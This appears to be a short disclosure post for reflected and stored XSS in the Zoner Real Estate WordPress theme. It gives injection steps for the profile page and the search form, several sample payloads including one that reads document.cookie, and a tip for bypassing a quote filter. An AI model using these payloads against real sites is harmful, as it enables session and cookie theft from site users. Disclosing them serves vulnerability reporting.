zoner-real-estate Zoner – Real Estate <= 4.1 – Reflected & Stored XSS
Proof of Concept
PoC (Stored XSS Injection): Register on the demo website and go to https://zoner.fruitfulcode.com/author/[your_login]/?profile-page=my_profile page. Inside any text field type "> first just to «close» an input field, then use your payload, save the data and your code will be successfully injected. For any text box instead of "> use </textarea> first and then your payload. Sample payload #1: ">alert('QUIXSS') Sample payload #2: "><img src="x" onerror="alert('QUIXSS');"> Sample payload #3: "><img src=x onerror=alert('QUIXSS')> PoC (Reflected XSS Injection): Go to any page with the «Search Your Property» form, f.e. https://zoner.fruitfulcode.com/home_v/3/ and use your payload inside the «Keyword» input field. Keep in mind that quotes will be filtered, but u can bypass it by using combination of ` quotes and «no quotes» (check the provided samples). Sample payload #1: "><img src="x" onerror="alert(document.cookie)"> Sample payload #2: "><img src="x" onerror=window.location.replace(`https://twitter.com/quixss`)>

Source

SEO News and More

SEO News and More

Share This